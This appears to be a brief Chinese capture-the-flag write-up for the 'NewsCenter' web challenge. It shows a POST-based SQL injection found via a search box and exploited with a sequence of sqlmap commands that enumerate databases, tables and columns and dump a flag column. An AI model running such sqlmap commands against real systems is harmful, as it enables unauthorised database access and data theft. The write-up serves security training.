NewsCenter

打开界面有一个搜索框

 抓包查看是post形式提交的数据包

 这时候试试sql注入，万能密码直接全都显示，那就说明存在sql注入漏洞

 这里试试用sqlmap自动注入试试（POST类型的sql注入第一次尝试）

• 查数据库

sqlmap.py -r test1.txt --dbs

 

 

•  查表

sqlmap.py -r test1.txt -D news --tables

•  查列

sqlmap.py -r test1.txt -D news -T secret_table --columns

•  查字段

sqlmap.py -r test1.txt -D news -T secret_table -C "fl4g" --dump

 得到flag：QCTF{sq1_inJec7ion_ezzz}

 

或者直接一步到位把整个数据库的字段爆出来

sqlmap.py -r test1.txt -D news --dump